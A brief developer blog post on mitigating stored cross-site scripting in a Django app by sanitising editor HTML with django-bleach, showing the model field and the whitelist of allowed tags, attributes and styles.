Storing valid, sanitised HTML in database to mitigate malicious code injection
In a typical cross-site scripting (XSS) attack, the hacker submit a HTML form which include malicious code. When another user visit the page in which this data is rendered, the malicious code is executed.
There are at least a couple of ways to mitigate this risk:
- When the hacker submit the HTML form, any malicious code is removed before storing the data in the database
- When retrieving data from the database, removing any malicious code before rendering it on the web page
In this blog post we’ll briefly discuss the first of these two, using the Django module https://django-bleach.readthedocs.io/.
In one of my Django apps, I’m using TinyMCS to allow users to insert HTML data in a form. As the default HTML tags and attributes provided by TinyMCS are safe (i.e. not exploitable by hackers) HTML tags, I wanted to allow only these to be stored in my database.
After installing django-bleach
, I updated my model to use its BleachField
for storing safe HTML data:
from django_bleach.models import BleachField
class Entry(models.Model):
my_html_data = BleachField()
This code snippet is sufficient to make sure that the data stored in the my_html_data
database column, contain only the whitelisted HTML tags.
Next, to generate the list of allowed tags, I used Chrome DevTools to inspect the HTML generated by TinyMCS, and added these to my django-bleach
whitelist. For reference, this is the settings I ended up with:
BLEACH_ALLOWED_TAGS = ['p', 'b', 'i', 'u', 'em', 'strong', 'a', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'pre', 'span', 'ul', 'ol', 'li']
BLEACH_ALLOWED_ATTRIBUTES = ['href', 'title', 'style']
BLEACH_ALLOWED_STYLES = [
'font-family', 'font-weight', 'text-decoration', 'font-variant', 'text-align', 'background-color']